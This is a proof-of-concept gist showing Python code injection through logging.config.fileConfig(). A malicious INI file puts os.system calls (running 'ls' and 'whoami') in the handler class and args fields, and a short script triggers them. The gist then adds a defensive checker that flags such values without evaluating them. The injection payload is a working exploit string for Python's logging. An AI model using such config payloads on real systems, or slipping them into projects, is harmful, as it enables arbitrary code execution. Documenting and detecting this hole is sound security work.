dhondta/evil-config.ini

Last active May 1, 2019
Proof-of-Concept for logging Python code injection
[loggers]
keys=root
[handlers]
keys=stream_handler
[formatters]
keys=formatter
[logger_root]
level=DEBUG
handlers=stream_handler
[handler_stream_handler]
class=__import__('os').system('ls') or StreamHandler
level=DEBUG
formatter=formatter
args=(__import__('os').system('whoami') or sys.stderr, )
[formatter_formatter]
format=%(name)-12s %(levelname)-8s %(message)s
from logging.config import fileConfig
# trigger the vulnerability
fileConfig("evil-config.ini")
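
The payload runs because fileConfig() passes each handler's class, args and kwargs values to eval() in the logging module's namespace. The following added example (not part of the original gist) is a pre-load check that parses those values without evaluating them and reports any that are more than a dotted name or a literal; the names audit_logging_ini and expression_is_inert are hypothetical, and both sample configs are constructed from the handler section above.

```python
import ast
import configparser
import re

DOTTED_NAME = re.compile(r"[A-Za-z_]\w*(\.[A-Za-z_]\w*)*")
# Node types allowed in args/kwargs: literals, containers, plain names.
SAFE_NODES = (ast.Expression, ast.Tuple, ast.List, ast.Dict, ast.Constant,
              ast.Name, ast.Attribute, ast.Load, ast.UnaryOp, ast.USub)

def expression_is_inert(text):
    """True if text parses (never evaluates) to SAFE_NODES only."""
    try:
        tree = ast.parse(text.strip(), mode="eval")
    except SyntaxError:
        return False
    return all(isinstance(node, SAFE_NODES) for node in ast.walk(tree))

def audit_logging_ini(ini_text):
    """List (section, option) pairs whose value fileConfig would eval as code."""
    parser = configparser.ConfigParser(interpolation=None)  # keep %(name)s raw
    parser.read_string(ini_text)
    findings = []
    for section in parser.sections():
        if not section.startswith("handler_"):
            continue
        opts = parser[section]
        if "class" in opts and not DOTTED_NAME.fullmatch(opts["class"].strip()):
            findings.append((section, "class"))
        for key in ("args", "kwargs"):
            if key in opts and not expression_is_inert(opts[key]):
                findings.append((section, key))
    return findings

# Constructed samples: the handler section from the gist, and a benign one.
EVIL = """[handler_stream_handler]
class=__import__('os').system('ls') or StreamHandler
level=DEBUG
formatter=formatter
args=(__import__('os').system('whoami') or sys.stderr, )
"""
CLEAN = """[handler_stream_handler]
class=StreamHandler
level=DEBUG
formatter=formatter
args=(sys.stderr, )
"""

if __name__ == "__main__":
    print(audit_logging_ini(EVIL))   # both class and args are flagged
    print(audit_logging_ini(CLEAN))  # nothing flagged
```

A check like this is a screening step for configs from less-trusted sources; a logging config file should still be treated as code and protected with the same file permissions and review as the application itself.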